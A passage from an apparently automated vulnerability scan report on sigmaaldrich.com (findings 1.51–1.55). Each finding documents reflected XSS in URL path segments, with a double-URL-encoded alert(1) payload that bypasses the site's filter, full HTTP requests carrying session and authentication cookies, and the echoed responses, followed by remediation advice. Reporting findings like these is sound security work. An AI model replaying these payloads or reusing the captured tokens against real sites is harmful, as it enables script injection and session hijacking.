The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2581%2522%253balert%25281%2529%252f%252fda56d308be3 was submitted in the REST URL parameter 2. This input was echoed as a2581";alert(1)//da56d308be3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesisa2581%2522%253balert%25281%2529%252f%252fda56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesisa2581";alert(1)//da56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.51. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3 was submitted in the REST URL parameter 3. This input was echoed as b0367";alert(1)//b9e8ecba5c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-centerb0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-centerb0367";alert(1)//b9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.52. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c was submitted in the REST URL parameter 4. This input was echoed as 8ecd0";alert(1)//8e4e3844c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0";alert(1)//8e4e3844c4c/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.53. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 was submitted in the REST URL parameter 5. This input was echoed as d4308";alert(1)//886483ea1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:36 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308";alert(1)//886483ea1d9","E404") ;
   </script>
...[SNIP]...

1.54. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4 was submitted in the REST URL parameter 1. This input was echoed as fe1bd";alert(1)//4c13458dba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryfe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4/chemistry-products1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28938
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryfe1bd";alert(1)//4c13458dba4/chemistry-products1.html","E404") ;
   </script>
...[SNIP]...

1.55. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6952%2522%253balert%25281%2529%252f%252f490a10955c0 was submitted in the REST URL parameter 2. This input was echoed as d6952";alert(1)//490a10955c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

